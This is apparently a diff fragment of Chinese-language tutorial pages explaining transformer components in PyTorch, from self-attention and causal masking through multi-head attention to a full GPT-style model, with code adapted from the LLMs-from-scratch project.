[0.57, 0.85, 0.64], # starts (x^3)
|
||||
[0.22, 0.58, 0.33], # with (x^4)
|
||||
[0.77, 0.25, 0.10], # one (x^5)
|
||||
[0.05, 0.80, 0.55]] # step (x^6)
|
||||
)
|
||||
|
||||
import torch.nn as nn
|
||||
class SelfAttention_v2(nn.Module):
|
||||
|
||||
def __init__(self, d_in, d_out, qkv_bias=False):
|
||||
super().__init__()
|
||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
|
||||
def forward(self, x):
|
||||
keys = self.W_key(x)
|
||||
queries = self.W_query(x)
|
||||
values = self.W_value(x)
|
||||
|
||||
attn_scores = queries @ keys.T
|
||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
|
||||
|
||||
context_vec = attn_weights @ values
|
||||
return context_vec
|
||||
|
||||
d_in=3
|
||||
d_out=2
|
||||
torch.manual_seed(789)
|
||||
sa_v2 = SelfAttention_v2(d_in, d_out)
|
||||
print(sa_v2(inputs))
|
||||
```
|
||||
> [!NOTE]
|
||||
> 请注意,`nn.Linear` 用于将所有权重标记为可训练参数,而不是用随机值初始化矩阵。
|
||||
|
||||
## 因果注意力:隐藏未来词汇
|
||||
|
||||
对于 LLM,我们希望模型仅考虑当前位之前出现的标记,以便 **预测下一个标记**。**因果注意力**,也称为 **掩蔽注意力**,通过修改注意力机制来防止访问未来标记,从而实现这一点。
|
||||
|
||||
### 应用因果注意力掩码
|
||||
|
||||
为了实现因果注意力,我们在 **softmax 操作之前** 对注意力分数应用掩码,以便剩余的分数仍然相加为 1。该掩码将未来标记的注意力分数设置为负无穷,确保在 softmax 之后,它们的注意力权重为零。
|
||||
|
||||
**步骤**
|
||||
|
||||
1. **计算注意力分数**:与之前相同。
|
||||
2. **应用掩码**:使用一个上三角矩阵,在对角线以上填充负无穷。
|
||||
|
||||
```python
|
||||
mask = torch.triu(torch.ones(seq_len, seq_len), diagonal=1) * float('-inf')
|
||||
masked_scores = attention_scores + mask
|
||||
```
|
||||
|
||||
3. **应用 Softmax**:使用掩蔽分数计算注意力权重。
|
||||
|
||||
```python
|
||||
attention_weights = torch.softmax(masked_scores, dim=-1)
|
||||
```
|
||||
|
||||
### 使用 Dropout 掩蔽额外的注意力权重
|
||||
|
||||
为了 **防止过拟合**,我们可以在 softmax 操作后对注意力权重应用 **dropout**。Dropout **在训练期间随机将一些注意力权重置为零**。
|
||||
```python
|
||||
dropout = nn.Dropout(p=0.5)
|
||||
attention_weights = dropout(attention_weights)
|
||||
```
|
||||
常规的 dropout 率约为 10-20%。
|
||||
|
||||
### 代码示例
|
||||
|
||||
来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb) 的代码示例:
|
||||
```python
|
||||
import torch
|
||||
import torch.nn as nn
|
||||
|
||||
inputs = torch.tensor(
|
||||
[[0.43, 0.15, 0.89], # Your (x^1)
|
||||
[0.55, 0.87, 0.66], # journey (x^2)
|
||||
[0.57, 0.85, 0.64], # starts (x^3)
|
||||
[0.22, 0.58, 0.33], # with (x^4)
|
||||
[0.77, 0.25, 0.10], # one (x^5)
|
||||
[0.05, 0.80, 0.55]] # step (x^6)
|
||||
)
|
||||
|
||||
batch = torch.stack((inputs, inputs), dim=0)
|
||||
print(batch.shape)
|
||||
|
||||
class CausalAttention(nn.Module):
|
||||
|
||||
def __init__(self, d_in, d_out, context_length,
|
||||
dropout, qkv_bias=False):
|
||||
super().__init__()
|
||||
self.d_out = d_out
|
||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.dropout = nn.Dropout(dropout)
|
||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New
|
||||
|
||||
def forward(self, x):
|
||||
b, num_tokens, d_in = x.shape
|
||||
# b is the num of batches
|
||||
# num_tokens is the number of tokens per batch
|
||||
# d_in is the dimensions er token
|
||||
|
||||
keys = self.W_key(x) # This generates the keys of the tokens
|
||||
queries = self.W_query(x)
|
||||
values = self.W_value(x)
|
||||
|
||||
attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply
|
||||
attn_scores.masked_fill_( # New, _ ops are in-place
|
||||
self.mask.bool()[:num_tokens, :num_tokens], -torch.inf) # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size
|
||||
attn_weights = torch.softmax(
|
||||
attn_scores / keys.shape[-1]**0.5, dim=-1
|
||||
)
|
||||
attn_weights = self.dropout(attn_weights)
|
||||
|
||||
context_vec = attn_weights @ values
|
||||
return context_vec
|
||||
|
||||
torch.manual_seed(123)
|
||||
|
||||
context_length = batch.shape[1]
|
||||
d_in = 3
|
||||
d_out = 2
|
||||
ca = CausalAttention(d_in, d_out, context_length, 0.0)
|
||||
|
||||
context_vecs = ca(batch)
|
||||
|
||||
print(context_vecs)
|
||||
print("context_vecs.shape:", context_vecs.shape)
|
||||
```
|
||||
## 扩展单头注意力到多头注意力
|
||||
|
||||
**多头注意力** 在实际操作中是执行 **多个实例** 的自注意力函数,每个实例都有 **自己的权重**,因此计算出不同的最终向量。
|
||||
|
||||
### 代码示例
|
||||
|
||||
可以重用之前的代码,只需添加一个包装器来多次启动它,但这是一个更优化的版本,来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb),它同时处理所有头(减少了昂贵的 for 循环数量)。正如您在代码中看到的,每个标记的维度根据头的数量被划分为不同的维度。这样,如果标记有 8 个维度,而我们想使用 3 个头,维度将被划分为 2 个 4 维的数组,每个头将使用其中一个:
|
||||
```python
|
||||
class MultiHeadAttention(nn.Module):
|
||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
|
||||
super().__init__()
|
||||
assert (d_out % num_heads == 0), \
|
||||
"d_out must be divisible by num_heads"
|
||||
|
||||
self.d_out = d_out
|
||||
self.num_heads = num_heads
|
||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
|
||||
|
||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
|
||||
self.dropout = nn.Dropout(dropout)
|
||||
self.register_buffer(
|
||||
"mask",
|
||||
torch.triu(torch.ones(context_length, context_length),
|
||||
diagonal=1)
|
||||
)
|
||||
|
||||
def forward(self, x):
|
||||
b, num_tokens, d_in = x.shape
|
||||
# b is the num of batches
|
||||
# num_tokens is the number of tokens per batch
|
||||
# d_in is the dimensions er token
|
||||
|
||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
|
||||
queries = self.W_query(x)
|
||||
values = self.W_value(x)
|
||||
|
||||
# We implicitly split the matrix by adding a `num_heads` dimension
|
||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
|
||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
|
||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
|
||||
keys = keys.transpose(1, 2)
|
||||
queries = queries.transpose(1, 2)
|
||||
values = values.transpose(1, 2)
|
||||
|
||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
|
||||
attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head
|
||||
|
||||
# Original mask truncated to the number of tokens and converted to boolean
|
||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
|
||||
|
||||
# Use the mask to fill attention scores
|
||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
|
||||
|
||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
|
||||
attn_weights = self.dropout(attn_weights)
|
||||
|
||||
# Shape: (b, num_tokens, num_heads, head_dim)
|
||||
context_vec = (attn_weights @ values).transpose(1, 2)
|
||||
|
||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
|
||||
context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
|
||||
context_vec = self.out_proj(context_vec) # optional projection
|
||||
|
||||
return context_vec
|
||||
|
||||
torch.manual_seed(123)
|
||||
|
||||
batch_size, context_length, d_in = batch.shape
|
||||
d_out = 2
|
||||
mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2)
|
||||
|
||||
context_vecs = mha(batch)
|
||||
|
||||
print(context_vecs)
|
||||
print("context_vecs.shape:", context_vecs.shape)
|
||||
|
||||
```
|
||||
对于另一个紧凑且高效的实现,您可以在 PyTorch 中使用 [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) 类。
|
||||
|
||||
> [!TIP]
|
||||
> ChatGPT 关于为什么将令牌的维度分配给各个头而不是让每个头检查所有令牌的所有维度的简短回答:
|
||||
>
|
||||
> 尽管允许每个头处理所有嵌入维度似乎是有利的,因为每个头将能够访问完整的信息,但标准做法是 **将嵌入维度分配给各个头**。这种方法在计算效率与模型性能之间取得了平衡,并鼓励每个头学习多样化的表示。因此,通常更倾向于分割嵌入维度,而不是让每个头检查所有维度。
|
||||
|
||||
## References
|
||||
|
||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
||||
@ -1,666 +0,0 @@
|
||||
# 5. LLM架构
|
||||
|
||||
## LLM架构
|
||||
|
||||
> [!TIP]
|
||||
> 第五阶段的目标非常简单:**开发完整LLM的架构**。将所有内容整合在一起,应用所有层并创建所有功能以生成文本或将文本转换为ID及其反向操作。
|
||||
>
|
||||
> 该架构将用于训练和预测文本,训练后进行预测。
|
||||
|
||||
LLM架构示例来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
|
||||
|
||||
可以观察到高层次的表示:
|
||||
|
||||
<figure><img src="../../images/image (3) (1) (1) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31">https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31</a></p></figcaption></figure>
|
||||
|
||||
1. **输入(标记化文本)**:该过程以标记化文本开始,该文本被转换为数值表示。
|
||||
2. **标记嵌入和位置嵌入层**:标记化文本通过**标记嵌入**层和**位置嵌入层**,后者捕捉序列中标记的位置,这对理解单词顺序至关重要。
|
||||
3. **变换器块**:模型包含**12个变换器块**,每个块有多个层。这些块重复以下序列:
|
||||
- **掩蔽多头注意力**:允许模型同时关注输入文本的不同部分。
|
||||
- **层归一化**:一个归一化步骤,以稳定和改善训练。
|
||||
- **前馈层**:负责处理来自注意力层的信息并对下一个标记进行预测。
|
||||
- **丢弃层**:这些层通过在训练期间随机丢弃单元来防止过拟合。
|
||||
4. **最终输出层**:模型输出一个**4x50,257维的张量**,其中**50,257**表示词汇表的大小。该张量中的每一行对应于模型用于预测序列中下一个单词的向量。
|
||||
5. **目标**:目标是将这些嵌入转换回文本。具体来说,输出的最后一行用于生成下一个单词,在该图中表示为“前进”。
|
||||
|
||||
### 代码表示
|
||||
```python
|
||||
import torch
|
||||
import torch.nn as nn
|
||||
import tiktoken
|
||||
|
||||
class GELU(nn.Module):
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
|
||||
def forward(self, x):
|
||||
return 0.5 * x * (1 + torch.tanh(
|
||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
|
||||
(x + 0.044715 * torch.pow(x, 3))
|
||||
))
|
||||
|
||||
class FeedForward(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.layers = nn.Sequential(
|
||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
|
||||
GELU(),
|
||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
|
||||
)
|
||||
|
||||
def forward(self, x):
|
||||
return self.layers(x)
|
||||
|
||||
class MultiHeadAttention(nn.Module):
|
||||
def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
|
||||
super().__init__()
|
||||
assert d_out % num_heads == 0, "d_out must be divisible by num_heads"
|
||||
|
||||
self.d_out = d_out
|
||||
self.num_heads = num_heads
|
||||
self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim
|
||||
|
||||
self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
|
||||
self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs
|
||||
self.dropout = nn.Dropout(dropout)
|
||||
self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
|
||||
|
||||
def forward(self, x):
|
||||
b, num_tokens, d_in = x.shape
|
||||
|
||||
keys = self.W_key(x) # Shape: (b, num_tokens, d_out)
|
||||
queries = self.W_query(x)
|
||||
values = self.W_value(x)
|
||||
|
||||
# We implicitly split the matrix by adding a `num_heads` dimension
|
||||
# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
|
||||
keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
values = values.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
|
||||
|
||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
|
||||
keys = keys.transpose(1, 2)
|
||||
queries = queries.transpose(1, 2)
|
||||
values = values.transpose(1, 2)
|
||||
|
||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
|
||||
attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head
|
||||
|
||||
# Original mask truncated to the number of tokens and converted to boolean
|
||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
|
||||
|
||||
# Use the mask to fill attention scores
|
||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
|
||||
|
||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
|
||||
attn_weights = self.dropout(attn_weights)
|
||||
|
||||
# Shape: (b, num_tokens, num_heads, head_dim)
|
||||
context_vec = (attn_weights @ values).transpose(1, 2)
|
||||
|
||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
|
||||
context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
|
||||
context_vec = self.out_proj(context_vec) # optional projection
|
||||
|
||||
return context_vec
|
||||
|
||||
class LayerNorm(nn.Module):
|
||||
def __init__(self, emb_dim):
|
||||
super().__init__()
|
||||
self.eps = 1e-5
|
||||
self.scale = nn.Parameter(torch.ones(emb_dim))
|
||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
|
||||
|
||||
def forward(self, x):
|
||||
mean = x.mean(dim=-1, keepdim=True)
|
||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
|
||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
|
||||
return self.scale * norm_x + self.shift
|
||||
|
||||
class TransformerBlock(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.att = MultiHeadAttention(
|
||||
d_in=cfg["emb_dim"],
|
||||
d_out=cfg["emb_dim"],
|
||||
context_length=cfg["context_length"],
|
||||
num_heads=cfg["n_heads"],
|
||||
dropout=cfg["drop_rate"],
|
||||
qkv_bias=cfg["qkv_bias"])
|
||||
self.ff = FeedForward(cfg)
|
||||
self.norm1 = LayerNorm(cfg["emb_dim"])
|
||||
self.norm2 = LayerNorm(cfg["emb_dim"])
|
||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
|
||||
|
||||
def forward(self, x):
|
||||
# Shortcut connection for attention block
|
||||
shortcut = x
|
||||
x = self.norm1(x)
|
||||
x = self.att(x) # Shape [batch_size, num_tokens, emb_size]
|
||||
x = self.drop_shortcut(x)
|
||||
x = x + shortcut # Add the original input back
|
||||
|
||||
# Shortcut connection for feed forward block
|
||||
shortcut = x
|
||||
x = self.norm2(x)
|
||||
x = self.ff(x)
|
||||
x = self.drop_shortcut(x)
|
||||
x = x + shortcut # Add the original input back
|
||||
|
||||
return x
|
||||
|
||||
|
||||
class GPTModel(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
|
||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
|
||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
|
||||
|
||||
self.trf_blocks = nn.Sequential(
|
||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
|
||||
|
||||
self.final_norm = LayerNorm(cfg["emb_dim"])
|
||||
self.out_head = nn.Linear(
|
||||
cfg["emb_dim"], cfg["vocab_size"], bias=False
|
||||
)
|
||||
|
||||
def forward(self, in_idx):
|
||||
batch_size, seq_len = in_idx.shape
|
||||
tok_embeds = self.tok_emb(in_idx)
|
||||
pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
|
||||
x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size]
|
||||
x = self.drop_emb(x)
|
||||
x = self.trf_blocks(x)
|
||||
x = self.final_norm(x)
|
||||
logits = self.out_head(x)
|
||||
return logits
|
||||
|
||||
GPT_CONFIG_124M = {
|
||||
"vocab_size": 50257, # Vocabulary size
|
||||
"context_length": 1024, # Context length
|
||||
"emb_dim": 768, # Embedding dimension
|
||||
"n_heads": 12, # Number of attention heads
|
||||
"n_layers": 12, # Number of layers
|
||||
"drop_rate": 0.1, # Dropout rate
|
||||
"qkv_bias": False # Query-Key-Value bias
|
||||
}
|
||||
|
||||
torch.manual_seed(123)
|
||||
model = GPTModel(GPT_CONFIG_124M)
|
||||
out = model(batch)
|
||||
print("Input batch:\n", batch)
|
||||
print("\nOutput shape:", out.shape)
|
||||
print(out)
|
||||
```
|
||||
### **GELU 激活函数**
|
||||
```python
|
||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
||||
class GELU(nn.Module):
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
|
||||
def forward(self, x):
|
||||
return 0.5 * x * (1 + torch.tanh(
|
||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
|
||||
(x + 0.044715 * torch.pow(x, 3))
|
||||
))
|
||||
```
|
||||
#### **目的和功能**
|
||||
|
||||
- **GELU (高斯误差线性单元):** 一种激活函数,为模型引入非线性。
|
||||
- **平滑激活:** 与ReLU不同,ReLU将负输入归零,而GELU平滑地将输入映射到输出,允许负输入有小的非零值。
|
||||
- **数学定义:**
|
||||
|
||||
<figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
> [!NOTE]
|
||||
> 在FeedForward层内的线性层之后使用此函数的目的是将线性数据转换为非线性,以便模型能够学习复杂的非线性关系。
|
||||
|
||||
### **前馈神经网络**
|
||||
|
||||
_已添加形状作为注释,以更好地理解矩阵的形状:_
|
||||
```python
|
||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
||||
class FeedForward(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.layers = nn.Sequential(
|
||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
|
||||
GELU(),
|
||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
|
||||
)
|
||||
|
||||
def forward(self, x):
|
||||
# x shape: (batch_size, seq_len, emb_dim)
|
||||
|
||||
x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim)
|
||||
x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim)
|
||||
x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim)
|
||||
return x # Output shape: (batch_size, seq_len, emb_dim)
|
||||
```
|
||||
#### **目的和功能**
|
||||
|
||||
- **位置-wise 前馈网络:** 对每个位置分别且相同地应用一个两层全连接网络。
|
||||
- **层详细信息:**
|
||||
- **第一线性层:** 将维度从 `emb_dim` 扩展到 `4 * emb_dim`。
|
||||
- **GELU 激活:** 应用非线性。
|
||||
- **第二线性层:** 将维度减少回 `emb_dim`。
|
||||
|
||||
> [!NOTE]
|
||||
> 如您所见,前馈网络使用了 3 层。第一层是一个线性层,它将维度乘以 4,使用线性权重(模型内部训练的参数)。然后,在所有这些维度中使用 GELU 函数应用非线性变化,以捕捉更丰富的表示,最后再使用另一个线性层返回到原始维度大小。
|
||||
|
||||
### **多头注意力机制**
|
||||
|
||||
这在前面的部分已经解释过。
|
||||
|
||||
#### **目的和功能**
|
||||
|
||||
- **多头自注意力:** 允许模型在编码一个标记时关注输入序列中的不同位置。
|
||||
- **关键组件:**
|
||||
- **查询、键、值:** 输入的线性投影,用于计算注意力分数。
|
||||
- **头:** 多个并行运行的注意力机制(`num_heads`),每个具有减少的维度(`head_dim`)。
|
||||
- **注意力分数:** 作为查询和键的点积计算,经过缩放和掩蔽。
|
||||
- **掩蔽:** 应用因果掩蔽,以防止模型关注未来的标记(对于像 GPT 这样的自回归模型很重要)。
|
||||
- **注意力权重:** 掩蔽和缩放后的注意力分数的 Softmax。
|
||||
- **上下文向量:** 根据注意力权重的值的加权和。
|
||||
- **输出投影:** 线性层以组合所有头的输出。
|
||||
|
||||
> [!NOTE]
|
||||
> 该网络的目标是找到同一上下文中标记之间的关系。此外,标记被分配到不同的头中,以防止过拟合,尽管每个头找到的最终关系在该网络的末尾被组合在一起。
|
||||
>
|
||||
> 此外,在训练期间应用 **因果掩蔽**,以便在查看特定标记的关系时不考虑后来的标记,并且还应用了一些 **dropout** 以 **防止过拟合**。
|
||||
|
||||
### **层** 归一化
|
||||
```python
|
||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
||||
class LayerNorm(nn.Module):
|
||||
def __init__(self, emb_dim):
|
||||
super().__init__()
|
||||
self.eps = 1e-5 # Prevent division by zero during normalization.
|
||||
self.scale = nn.Parameter(torch.ones(emb_dim))
|
||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
|
||||
|
||||
def forward(self, x):
|
||||
mean = x.mean(dim=-1, keepdim=True)
|
||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
|
||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
|
||||
return self.scale * norm_x + self.shift
|
||||
```
|
||||
#### **目的和功能**
|
||||
|
||||
- **层归一化:** 一种用于对每个批次中单个示例的特征(嵌入维度)进行归一化的技术。
|
||||
- **组件:**
|
||||
- **`eps`:** 一个小常数(`1e-5`),在归一化过程中添加到方差中以防止除以零。
|
||||
- **`scale` 和 `shift`:** 可学习的参数(`nn.Parameter`),允许模型对归一化输出进行缩放和偏移。它们分别初始化为1和0。
|
||||
- **归一化过程:**
|
||||
- **计算均值(`mean`):** 计算输入 `x` 在嵌入维度(`dim=-1`)上的均值,同时保持维度以便广播(`keepdim=True`)。
|
||||
- **计算方差(`var`):** 计算 `x` 在嵌入维度上的方差,同样保持维度。`unbiased=False` 参数确保方差使用有偏估计量计算(除以 `N` 而不是 `N-1`),这在对特征而非样本进行归一化时是合适的。
|
||||
- **归一化(`norm_x`):** 从 `x` 中减去均值,并除以方差加 `eps` 的平方根。
|
||||
- **缩放和偏移:** 将可学习的 `scale` 和 `shift` 参数应用于归一化输出。
|
||||
|
||||
> [!NOTE]
|
||||
> 目标是确保同一标记的所有维度的均值为0,方差为1。这样做的目的是**通过减少内部协变量偏移来稳定深度神经网络的训练**,内部协变量偏移是指由于训练过程中参数更新而导致的网络激活分布的变化。
|
||||
|
||||
### **Transformer 块**
|
||||
|
||||
_已添加形状作为注释,以更好地理解矩阵的形状:_
|
||||
```python
|
||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
||||
|
||||
class TransformerBlock(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.att = MultiHeadAttention(
|
||||
d_in=cfg["emb_dim"],
|
||||
d_out=cfg["emb_dim"],
|
||||
context_length=cfg["context_length"],
|
||||
num_heads=cfg["n_heads"],
|
||||
dropout=cfg["drop_rate"],
|
||||
qkv_bias=cfg["qkv_bias"]
|
||||
)
|
||||
self.ff = FeedForward(cfg)
|
||||
self.norm1 = LayerNorm(cfg["emb_dim"])
|
||||
self.norm2 = LayerNorm(cfg["emb_dim"])
|
||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
|
||||
|
||||
def forward(self, x):
|
||||
# x shape: (batch_size, seq_len, emb_dim)
|
||||
|
||||
# Shortcut connection for attention block
|
||||
shortcut = x # shape: (batch_size, seq_len, emb_dim)
|
||||
x = self.norm1(x) # shape remains (batch_size, seq_len, emb_dim)
|
||||
x = self.att(x) # shape: (batch_size, seq_len, emb_dim)
|
||||
x = self.drop_shortcut(x) # shape remains (batch_size, seq_len, emb_dim)
|
||||
x = x + shortcut # shape: (batch_size, seq_len, emb_dim)
|
||||
|
||||
# Shortcut connection for feedforward block
|
||||
shortcut = x # shape: (batch_size, seq_len, emb_dim)
|
||||
x = self.norm2(x) # shape remains (batch_size, seq_len, emb_dim)
|
||||
x = self.ff(x) # shape: (batch_size, seq_len, emb_dim)
|
||||
x = self.drop_shortcut(x) # shape remains (batch_size, seq_len, emb_dim)
|
||||
x = x + shortcut # shape: (batch_size, seq_len, emb_dim)
|
||||
|
||||
return x # Output shape: (batch_size, seq_len, emb_dim)
|
||||
|
||||
```
|
||||
#### **目的和功能**
|
||||
|
||||
- **层的组成:** 结合多头注意力、前馈网络、层归一化和残差连接。
|
||||
- **层归一化:** 在注意力和前馈层之前应用,以确保稳定的训练。
|
||||
- **残差连接(快捷方式):** 将层的输入添加到其输出,以改善梯度流并使深层网络的训练成为可能。
|
||||
- **丢弃法:** 在注意力和前馈层之后应用,以进行正则化。
|
||||
|
||||
#### **逐步功能**
|
||||
|
||||
1. **第一个残差路径(自注意力):**
|
||||
- **输入(`shortcut`):** 保存原始输入以用于残差连接。
|
||||
- **层归一化(`norm1`):** 归一化输入。
|
||||
- **多头注意力(`att`):** 应用自注意力。
|
||||
- **丢弃法(`drop_shortcut`):** 应用丢弃法以进行正则化。
|
||||
- **添加残差(`x + shortcut`):** 与原始输入结合。
|
||||
2. **第二个残差路径(前馈):**
|
||||
- **输入(`shortcut`):** 保存更新后的输入以用于下一个残差连接。
|
||||
- **层归一化(`norm2`):** 归一化输入。
|
||||
- **前馈网络(`ff`):** 应用前馈变换。
|
||||
- **丢弃法(`drop_shortcut`):** 应用丢弃法。
|
||||
- **添加残差(`x + shortcut`):** 与第一个残差路径的输入结合。
|
||||
|
||||
> [!NOTE]
|
||||
> transformer块将所有网络组合在一起,并应用一些**归一化**和**丢弃法**以改善训练的稳定性和结果。\
|
||||
> 注意丢弃法是在每个网络使用后进行的,而归一化是在之前应用的。
|
||||
>
|
||||
> 此外,它还使用快捷方式,即**将网络的输出与其输入相加**。这有助于防止梯度消失问题,确保初始层的贡献与最后一层“相当”。
|
||||
|
||||
### **GPTModel**
|
||||
|
||||
_形状已作为注释添加,以更好地理解矩阵的形状:_
|
||||
```python
|
||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
|
||||
class GPTModel(nn.Module):
|
||||
def __init__(self, cfg):
|
||||
super().__init__()
|
||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
|
||||
# shape: (vocab_size, emb_dim)
|
||||
|
||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
|
||||
# shape: (context_length, emb_dim)
|
||||
|
||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
|
||||
|
||||
self.trf_blocks = nn.Sequential(
|
||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
|
||||
)
|
||||
# Stack of TransformerBlocks
|
||||
|
||||
self.final_norm = LayerNorm(cfg["emb_dim"])
|
||||
self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
|
||||
# shape: (emb_dim, vocab_size)
|
||||
|
||||
def forward(self, in_idx):
|
||||
# in_idx shape: (batch_size, seq_len)
|
||||
batch_size, seq_len = in_idx.shape
|
||||
|
||||
# Token embeddings
|
||||
tok_embeds = self.tok_emb(in_idx)
|
||||
# shape: (batch_size, seq_len, emb_dim)
|
||||
|
||||
# Positional embeddings
|
||||
pos_indices = torch.arange(seq_len, device=in_idx.device)
|
||||
# shape: (seq_len,)
|
||||
pos_embeds = self.pos_emb(pos_indices)
|
